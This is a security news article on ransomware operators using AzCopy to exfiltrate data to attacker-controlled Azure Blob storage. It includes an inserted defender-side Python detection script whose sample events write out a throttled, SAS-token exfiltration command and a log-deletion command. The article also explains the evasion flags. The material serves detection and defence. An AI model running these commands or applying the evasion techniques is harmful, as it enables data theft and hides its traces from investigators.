
AzCopy Utility Misused for Data Exfiltration in Ongoing Ransomware Attacks

Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption, turning a routine cloud migration tool into a stealthy theft channel.

Instead of relying on obviously malicious tools like Rclone or MegaSync, threat actors are pivoting to native, administrator-approved cloud utilities to blend into normal IT operations and evade traditional detection.

AzCopy is a command-line utility designed to move large volumes of data to and from Azure Storage, commonly used by enterprises for backup, migration, and large-scale data operations.

It is distributed as a standalone executable, widely trusted in corporate environments, and rarely blocked or tightly monitored by EDR solutions, which makes it attractive for “living-off-the-land” style exfiltration.

Ransomware groups such as BianLian and Rhysida have been observed using AzCopy and Azure Storage Explorer to bulk-upload stolen files from breached networks into attacker-controlled Azure Blob storage, treating Microsoft’s cloud as their exfiltration staging ground.

Varonis Threat Labs' forensic unit has uncovered ransomware operators using a trusted Azure utility, AzCopy, as a data exfiltration tool.

SAS Token (Source: Varonis).

Attackers typically obtain valid Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens to access storage accounts without interactive logins.

AzCopy’s New Role in Cyberattacks

A SAS URL effectively embeds all required permissions, time windows, and target containers, allowing a single AzCopy command to stream large datasets straight into an external blob container.

To avoid triggering network-spike alerts, adversaries can use the --cap-mbps flag to intentionally throttle transfer throughput, keeping traffic volumes stable and less suspicious on monitoring dashboards.

They can also restrict which files are copied using include/exclude patterns and time-based filters such as --include-after, focusing on recent, high-value documents while minimizing noise.

What makes this technique especially dangerous is that the destination is a fully legitimate cloud provider and the channel is standard HTTPS to domains like *.blob.core.windows.net, which are often broadly allowed through firewalls and proxies.

In some real-world incidents, AzCopy-driven exfiltration went completely undetected by endpoint security tools, leaving it to specialized data security platforms and forensic analysis to reconstruct what was stolen.

Even when Azure logging is enabled, threat actors may attempt to cover their tracks by deleting the local %USERPROFILE%\.azcopy logging directory after completing transfers, removing a key source of evidence for investigators.

AzCopy Example Log File (Source: Varonis).

Traditional detection strategies that focus on suspicious third-party exfiltration tools leave a blind spot when attackers adopt native cloud utilities and sanctioned admin workflows.

Security teams must be prepared to investigate “odd but legitimate” scenarios, such as a 3 a.m. AzCopy job running under a backup or service account that suddenly accesses far more data than usual.

A data-centric security strategy is essential: organizations should map where sensitive data lives, who can access it, and what normal access and movement patterns look like so that deviations like a reporting account suddenly reading hundreds of thousands of files generate high-fidelity alerts.

Ransomware Campaigns Leveraging AzCopy

User and Entity Behavior Analytics (UEBA) can flag abnormal file access and AzCopy usage by service or privileged accounts, surfacing early signs of compromise before encryption begins.

Network monitoring should restrict direct internet access from servers to only known update and security endpoints, and connections to Azure Blob endpoints from systems that normally do not interact with cloud storage should be scrutinized.

Application control policies can further reduce risk by tightly scoping where AzCopy is allowed to run and under which accounts, ensuring that only specific, approved hosts and service identities can execute the utility.
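As an added, defender-side example (not from the article or from Varonis), the following Python triage routine scores constructed process-creation events against the indicators the article lists above: AzCopy launched outside an assumed allow-list of host/account pairs, an upload to a storage account the organization does not own, a SAS token and the --cap-mbps or --include-after flags on the command line, and deletion of the %USERPROFILE%\.azcopy log directory. The sample events, allow-lists and storage-account names are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
# Storage-account names and SAS values are fake placeholders.
SAMPLE_EVENTS = [
    {"host": "BACKUP01", "user": r"CORP\svc_backup", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Backups" "https://corpbackup.blob.core.windows.net/nightly" --recursive'},
    {"host": "FILESRV02", "user": r"CORP\svc_reporting", "image": r"C:\Users\Public\azcopy.exe",
     "cmdline": r'azcopy.exe copy "\\FILESRV02\Finance" "https://x7q2k.blob.core.windows.net/in?sv=FAKE&sig=FAKE" --recursive --cap-mbps 20 --include-after 2024-01-01T00:00:00Z'},
    {"host": "FILESRV02", "user": r"CORP\svc_reporting", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c rmdir /s /q C:\Users\svc_reporting\.azcopy'},
]

# Assumed allow-lists: the only host/account pairs and storage accounts sanctioned for AzCopy.
APPROVED_RUNNERS = {("BACKUP01", r"CORP\svc_backup")}
APPROVED_STORAGE = {"corpbackup"}

BLOB_RE = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net/", re.I)
LOGDIR_RE = re.compile(r"(rmdir|rd|del|remove-item)\b.*\\\.azcopy\b", re.I)

def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the detection reasons that fire for one process-creation event."""
    reasons: List[str] = []
    image, cmd = ev["image"].lower(), ev["cmdline"]
    if image.endswith("azcopy.exe"):
        if (ev["host"], ev["user"]) not in APPROVED_RUNNERS:
            reasons.append("azcopy run outside approved host/account pair")
        m = BLOB_RE.search(cmd)
        if m and m.group(1).lower() not in APPROVED_STORAGE:
            reasons.append(f"upload to unsanctioned storage account '{m.group(1)}'")
        if "sig=" in cmd:
            reasons.append("SAS token passed on the command line")
        if "--cap-mbps" in cmd:
            reasons.append("throttled transfer (--cap-mbps), possible alert evasion")
        if "--include-after" in cmd:
            reasons.append("time-filtered copy (--include-after) of recent files")
    elif LOGDIR_RE.search(cmd):
        reasons.append("AzCopy log directory (.azcopy) deleted; anti-forensics")
    return reasons

def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group firing reasons by host so a quiet, sanctioned backup job and an outlier are easy to tell apart."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for r in score_event(ev):
            findings.setdefault(ev["host"], []).append(f"{ev['user']}: {r}")
    return findings

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host, *hits, sep="\n  ")
```

In this constructed set the sanctioned BACKUP01 job (identity-based login, no SAS in the command line) fires nothing, while the FILESRV02 reporting account trips every rule plus the log-directory deletion.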

Incident response plans should explicitly address cloud-based exfiltration scenarios, including how to quickly revoke SAS tokens, rotate keys, isolate affected systems, and coordinate takedown or abuse reports with cloud providers while accepting that stolen data may already be replicated or backed up elsewhere.

As attackers increasingly weaponize legitimate cloud tools like AzCopy, organizations that fail to monitor their own trusted utilities risk letting their security stack “bless” the very traffic that delivers sensitive data into ransomware operators’ hands.
